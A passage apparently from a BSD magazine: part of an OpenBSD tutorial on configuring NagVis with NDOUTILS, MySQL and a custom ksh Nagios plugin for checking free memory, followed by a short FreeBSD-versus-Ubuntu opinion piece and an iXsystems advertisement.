uncomment the following line in /var/www/conf/httpd.conf:

/var/www/conf/httpd.conf
AddType application/x-httpd-php .php

and restart Apache:

# apachectl restart
/usr/sbin/apachectl restart: httpd restarted

Installing NDO and MySQL

Prior to version 1.0, NagVis was able to pull data from Nagios directly from its web interface; now this is not supported anymore and NagVis expects monitoring data to be stored in a MySQL database, thus requiring the installation of the Nagios Data Output Utils (NDOUTILS) addon.

The NDOUTILS addon allows you to export current and historical data from one or more Nagios instances to a MySQL database, thus providing the interface between Nagios and MySQL. This addon consists of several parts, but we will need only two of them:

• the NDOMOD event broker module, which is loaded by Nagios at startup and dumps all events and data from Nagios to a Unix or TCP socket;
• the NDO2DB daemon, which is a standalone daemon and reads the output produced by the NDOMOD module through the Unix or TCP socket and dumps it into the database.

First off, we need to install MySQL; the following is the list of the required packages:

• p5-Net-Daemon-x.x.tgz
• p5-PlRPC-x.x.tgz
• p5-DBI-x.x.tgz
• p5-DBD-mysql-x.x.tgz
• mysql-server-x.x.x.tgz

Next, we need to download (http://sourceforge.net/project/showfiles.php?group_id=26589), extract and compile the NDOUTILS tarball:

# tar -zxvf ndoutils-x.x.x.tar.gz
[...]
# cd ndoutils-x.x.x
# ./configure --disable-pgsql --enable-mysql --with-mysql-lib=/usr/local/lib \
>   --with-mysql-inc=/usr/local/include
[...]
# make

Note: if make fails to compile the dbhandlers.c file, try installing this patch (http://www.kernel-panic.it/openbsd/nagios/ndo-openbsd.patch applies to version 1.4b9) by running the following command from outside the ndoutils source tree:

# patch -p0 < ndo-openbsd.patch

Now we can start MySQL, assign a password to the root account and create the appropriate database and user. The database creation script can be found in the db/ directory of the extracted tarball (see Listing 18).

Now we need to manually copy the binaries and configuration files:

# cp src/ndomod-3x.o /usr/local/libexec/nagios/ndomod.o
# cp config/ndomod.cfg-sample /var/www/etc/nagios/ndomod.cfg
# cp src/ndo2db-3x /usr/local/sbin/ndo2db
# cp config/ndo2db.cfg-sample /var/www/etc/nagios/ndo2db.cfg

and edit the NDOMOD configuration file: see Listing 19. And the NDO2DB configuration file: see Listing 20.

Then we have to specify the event broker module that Nagios must load at startup, by adding the following line to the main configuration file:

/var/www/etc/nagios/nagios.cfg
broker_module=/usr/local/libexec/nagios/ndomod.o config_file=/var/www/etc/nagios/ndomod.cfg

and, finally, we can start the NDO2DB daemon and restart Nagios:

# /usr/local/sbin/ndo2db -c /var/www/etc/nagios/ndo2db.cfg
# chmod 770 /var/www/var/nagios/rw/ndo.sock
# pkill nagios
# nagios -d /var/www/etc/nagios/nagios.cfg

Add the following lines to /etc/rc.local to start the NDO2DB daemon on boot:

/etc/rc.local
if [ -x /usr/local/sbin/ndo2db ]; then
    echo -n ' ndo2db'
    /usr/local/sbin/ndo2db -c /var/www/etc/nagios/ndo2db.cfg
    chmod 770 /var/www/var/nagios/rw/ndo.sock
fi

Configuring NagVis

Now that we have installed all the necessary prerequisites, we can download (http://www.nagvis.org/downloads) and extract the NagVis tarball:

# tar -zxvf nagvis-x.x.x.tar.gz -C /var/www/nagios/
[...]
# mv /var/www/nagios/nagvis-x.x.x /var/www/nagios/nagvis
# chown -R www /var/www/nagios/nagvis/{etc,var}

Below is a sample NagVis configuration file (see Listing 21); please refer to the documentation (http://docs.nagvis.org/1.3/en_US/index.html) for a detailed description of each parameter.

Listing 21. The NagVis configuration file

/var/www/nagios/nagvis/etc/nagvis.ini.php
; <?php return 1; ?>
[global]
language = "en_US"
refreshtime = 60
dateformat = "Y-m-d H:i:s"
[defaults]
backend = "ndomy_1"
; Default iconset (icons can be found in
; /var/www/nagios/nagvis/images/iconsets)
icons = "std_medium"
recognizeservices = 1
onlyhardstates = 0
backgroundcolor = "#fff"
contextmenu = 1
eventbackground = 0
eventhighlight = 1
eventhighlightduration = 10000
eventhighlightinterval = 500
eventlog = 0
eventloglevel = "info"
eventlogheight = 75
eventloghidden = 1
eventscroll = 1
eventsound = 1
headermenu = 1
headertemplate = "default"
hovermenu = 1
hovertemplate = "default"
hoverdelay = 0
hoverchildsshow = 1
hoverchildslimit = 10
hoverchildsorder = "asc"
hoverchildssort = "s"
icons = "std_medium"
onlyhardstates = 0
recognizeservices = 1
showinlists = 1
urltarget = "_self"
hosturl = "[htmlcgi]/status.cgi?host=[host_name]"
hostgroupurl = "[htmlcgi]/status.cgi?hostgroup=[hostgroup_name]"
serviceurl = "[htmlcgi]/extinfo.cgi?type=2&host=[host_name]&service=[service_description]"
servicegroupurl = "[htmlcgi]/status.cgi?servicegroup=[servicegroup_name]&style=detail"
[wui]
autoupdatefreq = 25
maplocktime = 5
allowedforconfig = nagiosadmin
[paths]
base = "/nagios/nagvis/"
htmlbase = "/nagios/nagvis"
htmlcgi = "/cgi-bin/nagios"
[index]
backgroundcolor = #fff
cellsperrow = 4
headermenu = 1
headertemplate = "default"
showrotations = 1
[automap]
defaultparams = "&maxLayers=2"
showinlists = 0
[worker]
interval = 10
requestmaxparams = 0
requestmaxlength = 1900
updateobjectstates = 30
[backend_ndomy_1]
backendtype = "ndomy"
dbhost = "localhost"
dbport = 3306
dbname = "nagios"
dbuser = "ndouser"
dbpass = "ndopasswd"
dbprefix = "nagios_"
dbinstancename = "default"
maxtimewithoutupdate = 180
htmlcgi = "/cgi-bin/nagios"
; In this example, the browser switches between the 'dmz' and 'lan' maps every
; 15 seconds. The rotation is enabled by specifying the URL:
; https://your.nagios.server/nagios/nagvis/index.php?rotation=kp
[rotation_kp]
maps = "dmz,lan"
interval = 15

Maps definition

Now we have to create the images for NagVis to use as the background for each map and put them in the /var/www/nagios/nagvis/images/maps/ directory. You can find a few examples here (http://www.nagvis.org/screenshots). Once the map images are ready, we can tell NagVis where to place objects on the map by creating and editing the maps configuration files. Each map must have a corresponding configuration file (in /var/www/nagios/nagvis/etc/maps/) with the same name, plus the .cfg extension.

Below is a sample map configuration file; syntax is rather simple, so you can easily tweak it to include your own hosts and services (please refer to the documentation (http://docs.nagvis.org/1.3/en_US/index.html) for further details; see Listing 22).

Listing 22. A sample map configuration

/var/www/nagios/nagvis/etc/maps/dmz.cfg
# The 'global' statement sets some default values that will be inherited by all
# other objects
define global {
    # List of users allowed to view this map
    allowed_user=nagiosadmin,operator
    # List of users allowed to modify this map via the web interface
    allowed_for_config=nagiosadmin
    # Default iconset (if omitted, it is inherited from the main configuration file)
    iconset=std_medium
    # Background image
    map_image=dmz.png
}

# Display the status of our 'www1' web server
define host {
    host_name=www1
    # Coordinates of the host on the map
    x=268
    y=166
    # Set this to 1 if you want the host status to also include the status
    # of its services
    recognize_services=0
}

# Display the status of the 'WWW' service on the 'www1' web server
define service {
    host_name=www1
    service_description=WWW
    x=588
    y=165
    # As you can see, 'global' options can be overridden in subsequent objects
    iconset=std_small
}

# Display the worst state of hosts in the 'WWW' hostgroup
define hostgroup {
    hostgroup_name=WWW
    x=298
    y=363
    recognize_services=1
}

# Display the worst state of services in the 'www-services' servicegroup
define servicegroup {
    servicegroup_name=www-services
    x=609
    y=363
}

# Display the worst state of objects represented in another NagVis map
define map {
    map_name=lan
    x=406
    y=323
}

# Draw a textfield on the map
define textbox {
    # Text may include HTML
    text="This is the DMZ network"
    x=490
    y=394
    w=117
}

To allow the web interface to modify NagVis' configuration, make sure that all configuration files belong to, and are writable by, the www user:

# chown www /var/www/nagios/nagvis/etc/maps/*.cfg
# chmod 644 /var/www/nagios/nagvis/etc/maps/*.cfg

Writing your own Nagios plugins

Plugins are executable files run by Nagios to determine the status of a host or service. By default, Nagios comes with a very rich set of official plugins that should cover most people's needs; in addition, you can find lots of contributed plugins on the Monitoring Exchange website (http://www.monitoringexchange.org/), some of which are also available via OpenBSD's packages and ports system.

However, despite the abundance of plugins, there may be occasions in which no existing plugin is suitable for monitoring a particular service, thus forcing you to write a fully custom plugin, tailored to your exact needs. Luckily, this is a very simple task!

Nagios doesn't bind you to a specific programming language: plugins may be either compiled C programs or interpreted scripts, in Perl, shell, Python or any other language. Nagios doesn't mess with the internals of plugins; however, it asks developers to follow a few basic guidelines (http://nagiosplug.sourceforge.net/developer-guidelines.html), just for standard's sake.

Command line options

A plugin's command line must follow some specific requirements:

• positional arguments are strongly discouraged;
• all plugins should provide a -V command-line option (and --version if long options are enabled) to display the plugin's revision number;
• the -? option, as well as any incorrect option, displays a short usage statement that should fit on a standard 80x25 terminal;
• the -h, or --help, option displays detailed help information;
• the -v, or --verbose, option adjusts the verbosity level; multiple -v options (up to 3) should increase the verbosity level, as described in the official guidelines (http://nagiosplug.sourceforge.net/developer-guidelines.html#AEN40);
• there are a few other reserved options that should not be used for other purposes:
  • -t or --timeout (plugin timeout);
  • -w or --warning (warning threshold);
  • -c or --critical (critical threshold);
  • -H or --hostname (name of the host to check).

Plugin return codes

Nagios determines the status of a host or service based on the return code of the plugin. Valid return codes are: see Table 1.

Table 1. Valid plugin return codes

Service/Host status   Service status description                     Host status description
Ok/Up                 The plugin was able to check the service       The host is up and replied in
                      and it seemed to work correctly                acceptable time
Critical/Down         The service was not running or it exceeded     The host is down or some "critical"
                      some "critical" threshold                      threshold was exceeded

The warning and critical thresholds are usually set via command line options (see above, http://www.kernel-panic.it/openbsd/nagios/nagios6.html#nagios-6.1).

A sample plugin script

Just a couple of notes before moving to a practical example:

• plugins can access macros (http://nagios.sourceforge.net/docs/2_0/macros.html) as environment variables; such variables have the same name as the corresponding macros, with NAGIOS_ prepended. For instance, the $HOSTNAME$ macro will be accessible through the "NAGIOS_HOSTNAME" environment variable;
• always specify the full path of any system commands run from your plugins.

Well, so let's see, as an example, what a plugin to monitor the amount of free memory on the local machine could look like: see Listing 23.

Listing 23. A plugin to monitor the amount of free memory on the local machine

/usr/local/libexec/nagios/check_free_mem.sh
#!/bin/ksh

###############################################################################
# Sample Nagios plugin to monitor free memory on the local machine            #
# Author: Daniele Mazzocchio (http://www.kernel-panic.it/)                    #
###############################################################################

VERSION="Version 1.0"
AUTHOR="(c) 2007-2009 Daniele Mazzocchio (danix@kernel-panic.it)"
PROGNAME=`/usr/bin/basename $0`

# Constants
BYTES_IN_MB=$(( 1024 * 1024 ))
KB_IN_MB=1024

# Exit codes
STATE_OK=0
STATE_WARNING=1
STATE_CRITICAL=2
STATE_UNKNOWN=3

# Helper functions #############################################################

function print_revision {
    # Print the revision number
    echo "$PROGNAME - $VERSION"
}

function print_usage {
    # Print a short usage statement
    echo "Usage: $PROGNAME [-v] -w <limit> -c <limit>"
}

function print_help {
    # Print detailed help information
    print_revision
    echo "$AUTHOR\n\nCheck free memory on local machine\n"
    print_usage
    /bin/cat <<__EOT

Options:
-h
   Print detailed help screen
-V
   Print version information

-w INTEGER
   Exit with WARNING status if less than INTEGER MB of memory are free
-w PERCENT%
   Exit with WARNING status if less than PERCENT of memory is free
-c INTEGER
   Exit with CRITICAL status if less than INTEGER MB of memory are free
-c PERCENT%
   Exit with CRITICAL status if less than PERCENT of memory is free
-v
   Verbose output
__EOT
}

# Main #########################################################################

# Total memory size (in MB)
tot_mem=$(( `/sbin/sysctl -n hw.physmem` / BYTES_IN_MB ))
# Free memory size (in MB)
free_mem=$(( `/usr/bin/vmstat | /usr/bin/tail -1 | /usr/bin/awk '{ print $5 }'` \
    / KB_IN_MB ))
# Free memory size (in percentage)
free_mem_perc=$(( free_mem * 100 / tot_mem ))

# Verbosity level
verbosity=0
# Warning threshold
thresh_warn=
# Critical threshold
thresh_crit=

# Parse command line options
while [ "$1" ]; do
    case "$1" in
        -h | --help)
            print_help
            exit $STATE_OK
            ;;
        -V | --version)
            print_revision
            exit $STATE_OK
            ;;
        -v | --verbose)
            verbosity=$(( verbosity + 1 ))
            shift
            ;;
        -w | --warning | -c | --critical)
            if [[ -z "$2" || "$2" = -* ]]; then
                # Threshold not provided
                echo "$PROGNAME: Option '$1' requires an argument"
                print_usage
                exit $STATE_UNKNOWN
            elif [[ "$2" = +([0-9]) ]]; then
                # Threshold is a number (MB)
                thresh=$2
            elif [[ "$2" = +([0-9])% ]]; then
                # Threshold is a percentage
                thresh=$(( tot_mem * ${2%\%} / 100 ))
            else
                # Threshold is neither a number nor a percentage
                echo "$PROGNAME: Threshold must be integer or percentage"
                print_usage
                exit $STATE_UNKNOWN
            fi
            if [[ "$1" = -w || "$1" = --warning ]]; then
                thresh_warn=$thresh
            else
                thresh_crit=$thresh
            fi
            shift 2
            ;;
        -?)
            print_usage
            exit $STATE_OK
            ;;
        *)
            echo "$PROGNAME: Invalid option '$1'"
            print_usage
            exit $STATE_UNKNOWN
            ;;
    esac
done

if [[ -z "$thresh_warn" || -z "$thresh_crit" ]]; then
    # One or both thresholds were not specified
    echo "$PROGNAME: Threshold not set"
    print_usage
    exit $STATE_UNKNOWN
elif [[ "$thresh_crit" -gt "$thresh_warn" ]]; then
    # The warning threshold must be greater than the critical threshold
    echo "$PROGNAME: Warning free space should be more than critical free space"
    print_usage
    exit $STATE_UNKNOWN
fi

if [[ "$verbosity" -ge 2 ]]; then
    # Print debugging information
    /bin/cat <<__EOT
Debugging information:
  Warning threshold: $thresh_warn MB
  Critical threshold: $thresh_crit MB
  Verbosity level: $verbosity
  Total memory: $tot_mem MB
  Free memory: $free_mem MB ($free_mem_perc%)
__EOT
fi

if [[ "$free_mem" -lt "$thresh_crit" ]]; then
    # Free memory is less than the critical threshold
    echo "MEMORY CRITICAL - $free_mem_perc% free ($free_mem MB out of $tot_mem MB)"
    exit $STATE_CRITICAL
elif [[ "$free_mem" -lt "$thresh_warn" ]]; then
    # Free memory is less than the warning threshold
    echo "MEMORY WARNING - $free_mem_perc% free ($free_mem MB out of $tot_mem MB)"
    exit $STATE_WARNING
else
    # There's enough free memory!
    echo "MEMORY OK - $free_mem_perc% free ($free_mem MB out of $tot_mem MB)"
    exit $STATE_OK
fi
The Difference Between FreeBSD and Ubuntu in a Not So Technical Way

As a system administrator, I have been using various distributions of Linux and FreeBSD. I am comfortable in a mixed environment of *nix operating systems to provide network services.


possible so as not to start a flame war. I enjoy working with both systems and I like the way they are.

FreeBSD is a complete operating system. Userland 
utilities, drivers for the devices, and the kernel itself are 
available and held in a centralized location/repository. 
Linux on the other hand is actually just the kernel. Companies and organizations release their distribution/flavor by using and customizing the Linux kernel, bundling it with software/packages, mostly free and open-source software, and optionally adding some proprietary materials, drivers or codecs. This is the case for Ubuntu, the Linux distribution released by Canonical, Inc.

The default shell for regular users in FreeBSD is sh (Bourne Shell) and tcsh (Improved C Shell) for the root user.
In Ubuntu it is bash all the way. In terms of application 
configuration files, rest assured that FreeBSD keeps them 
in the /usr/local/etc. Ubuntu on the other hand, has this 
directory empty. Ubuntu uses the /etc and its subfolders 
for application configuration files. FreeBSD also uses the / 
etc/rc.conf file, which according to the man page, contains 
descriptive information about the local host name, 
configuration details for any potential network interfaces, 
and services that should be started at system boot up. 

FreeBSD is licensed under the BSD license. This is 
unrestrictive and gives freedom in a way that if an individual 
or an organization used, improved, or modified your code, 
and made a proprietary software from it, the individual or 
organization may or may not credit you. In my personal 
view, this is true freedom. Ubuntu on the other hand is 
licensed mostly under the GPL, which is very restrictive. It 
preserves and protects the openness of the software. 

As for the base installation, in my experience, FreeBSD 
installs faster against the base installation of Ubuntu 
Server. The formatting of partitions in FreeBSD is faster 
than Ubuntu (my personal experience again). In terms 
of software installation, you can choose a variety of 
methods using FreeBSD. My favorite of them all is the 
ports collection, which you need to be patient and more patient when you install. You can also use packages (not as complete as the ports collection) and compile sources. In Ubuntu, you use the APT system, dpkg packages, and you can also compile sources.

The documentation for FreeBSD is so complete that you will be able to learn a lot of stuff from the OS itself, shells, TCP/IP, and network services. I think Ubuntu's documentation is good too, but not as close as the FreeBSD handbook. Using and learning FreeBSD with the help of the handbook and the very supportive members of the FreeBSD Forum at http://forums.freebsd.org gives a new user the experience of learning the ins and outs of an operating system in a deeper way.

If you want to learn an operating system from the internals up to the applications, I would strongly recommend FreeBSD for you. You may not be able to do
things as you expect them to be easy. You will need a lot 
of patience and a couple of hours for software compilation 
(should you choose the ports collection). The learning 
you will gain is worthwhile and you will have a deeper 
understanding of a complete operating system. 

In short, the difference between FreeBSD and Ubuntu 
is in the internals, kernel, startup scripts, ways of software 
installation including management and most system 
utilities and tools. The software and applications they use 
are both free and open source software (FOSS), which 
means gnome is gnome, kde is kde, firefox is firefox, for 
both FreeBSD and Ubuntu. 

As promised, I did not write things that may or will start a flame war. I did my best to be honest, fair, and unbiased in discussing the difference between FreeBSD and Ubuntu in a not so technical way, but from the point of view of a casual user.


JOSHUA EBARVIA 

Joshua Ebarvia is a java programmer, systems administrator 
and college lecturer. His passion is working and using operating 
systems specially UNIX-based and UNIX-cloned systems. You can 
reach him at joshua.ebarvia@gmail.com 
Tired of being able to choose from only chocolate, strawberry, or vanilla? At iXsystems, we understand your need for custom-made servers.


“Open Source Hardware Design” is the iXsystems trademark. iXsystems provides an 
assortment of pre-configured servers and storage solutions, but our true pride rests on 
our ability to customize our products to meet your specific tastes and needs. iXsystems 
mixes in the raw power of Intel® Xeon® 5600/5500 Series Processors for a truly delicious 
treat. Our Professional Enterprise Service Level packages and desktop support offering 
also enables us to ensure you get the most from your FreeBSD® and PC-BSD™ systems, 
adding the perfect toppings to your order. 


Call iXsystems toll free or visit our website today! 
+1-800-820-BSDi | www.iXsystems.com 


Intel, the Intel logo, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the U.S. and other countries.